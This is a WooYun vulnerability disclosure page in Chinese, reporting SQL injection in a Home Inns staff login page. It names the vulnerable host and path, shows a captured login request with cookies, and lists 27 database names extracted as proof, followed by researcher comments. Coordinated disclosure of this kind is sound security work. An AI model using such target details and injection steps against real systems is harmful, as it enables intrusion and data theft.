如家SQL注入漏洞，涉及N多个库 | wooyun-2013-043186| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043186

漏洞标题：如家SQL注入漏洞，涉及N多个库

漏洞作者：小胖子

提交时间：2013-11-17 20:45

修复时间：2014-01-01 20:45

公开时间：2014-01-01 20:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-11-17：细节已通知厂商并且等待厂商处理中
2013-11-17：厂商已经确认，细节仅向厂商公开
2013-11-27：细节向核心白帽子及相关领域专家公开
2013-12-07：细节向普通白帽子公开
2013-12-17：细节向实习白帽子公开
2014-01-01：细节向公众公开

简要描述：

发现如家注册了...

详细说明：

漏洞地址：
office.homeinns.com
这个地址下涉及好多个系统！
office.homeinns.com/staffinfo/‎
office.homeinns.com/hcs/‎
等等...
注入点：
office.homeinns.com/staffinfo/login.aspx
登陆没有过滤，导致注射！
抓登陆包！

POST /staffinfo/login.aspx HTTP/1.1
Host: office.homeinns.com
Proxy-Connection: keep-alive
Content-Length: 203
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://office.homeinns.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.66 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://office.homeinns.com/staffinfo/login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASP.NET_SessionId=otxuq455k1anlkjcnfb3p245; NSC_WJQ_172.23.100.65=ffffffffaf1f7a5045525d5f4f58455e445a4a423660
__VIEWSTATE=%2FwEPDwUKMTk5MDQ2MDAwNmRkTaja6ST7t3GaH7rq30kvNrZxaGk%3D&__EVENTVALIDATION=%2FwEWBQKCmuahCQLT8dy8BQK1qbSRCwKM54rGBgK7q7GGCOJQVCNxCc3j8yhcNg%2FDVzetIsVA&txtUserID=1&txtPassword=1&Button1=Enter

果断是注入了~

读出来的数据！

current database:    'Staffinfo'

available databases [27]:
[*] [Smart eVision]
[*] [Smart eVision_2010_4_26_12_11_bak]
[*] [Smart eVision_2010_5_19_11_11_bak]
[*] App
[*] BBS
[*] HomeInnsDW
[*] HomeinnsSurvey
[*] ITOperationDB
[*] jbClub
[*] km
[*] Manage_Survey
[*] Manage_Survey_test
[*] ManageDB
[*] ManageDBTest
[*] master
[*] model
[*] msdb
[*] NCExport
[*] PraseDB
[*] PRM
[*] QC
[*] Rujia_equipment
[*] Staffinfo
[*] Staffinfo_Test
[*] tempdb
[*] Test
[*] UserInfoBus_Test

27个数据库，就不再列详细数据啦。

漏洞证明：

见详细说明。

修复方案：

0x1：登陆框过滤。
0x2：求20rank！

版权声明：转载请注明来源小胖子@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2013-11-17 20:57

厂商回复：

感谢关注！

漏洞评价：

2013-11-17 20:59 | 霍大然 ( 普通白帽子 | Rank:1136 漏洞数:178 | W币花完了，刷分还是不刷？)

@疯狗 @Finger 俺4个大河网的也给审下吧
2013-11-17 21:19 | cuger ( 普通白帽子 | Rank:200 漏洞数:44 | 这个家伙很懒，什么也没留下)

唉。。。。好几个站都在210那个站点上，不知道和我发的那个注入一样否？
2013-11-17 21:25 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

mark
2013-11-17 23:28 | px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)

目测这货最近要开房，这是要房卡来了
2013-11-19 22:17 | X防部 ( 普通白帽子 | Rank:487 漏洞数:137 )

曹 @小胖子你不是说换马甲报洞了吗？？、、、、、
2013-11-19 22:32 | 天朝城管 ( 普通白帽子 | Rank:116 漏洞数:35 | 不要等到命玩你的时候才开始玩命)

@小胖子 1222 二哥的rank真给力
2013-11-19 23:35 | 小胖子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

@X防部没忍住~马甲太多，不知道换哪个好了~
2013-12-07 11:05 | ohmygod ( 路人 | Rank:0 漏洞数:1 | sb)

顶

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043186

漏洞标题：如家SQL注入漏洞，涉及N多个库

相关厂商：如家酒店集团

漏洞作者：小胖子

提交时间：2013-11-17 20:45

修复时间：2014-01-01 20:45

公开时间：2014-01-01 20:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小胖子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-043186

漏洞标题：如家SQL注入漏洞，涉及N多个库

相关厂商：如家酒店集团

漏洞作者： 小胖子

提交时间：2013-11-17 20:45

修复时间：2014-01-01 20:45

公开时间：2014-01-01 20:45

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-043186"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小胖子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小胖子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小胖子@乌云